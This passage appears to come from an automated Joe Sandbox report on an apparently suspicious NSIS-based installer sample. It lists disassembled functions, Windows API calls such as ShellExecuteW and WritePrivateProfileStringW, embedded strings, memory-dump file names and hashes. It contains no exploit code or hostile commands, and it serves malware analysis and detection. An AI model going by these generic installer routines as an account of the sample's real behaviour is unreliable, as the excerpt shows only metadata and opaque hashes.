Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNELBASE(00000000), ref: 00402387

Strings

Exch: stack < %d elements, xrefs: 00401ED8
ForcesCompetitors, xrefs: 00401EFB, 00401F00, 00401F1A
Pop: stack empty, xrefs: 00401F2C

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$ForcesCompetitors$Pop: stack empty
API String ID: 1459762280-986891047
Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNELBASE(00000000), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

ForcesCompetitors, xrefs: 00402770
<RM>, xrefs: 00402713
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$ForcesCompetitors$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-1196008114
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
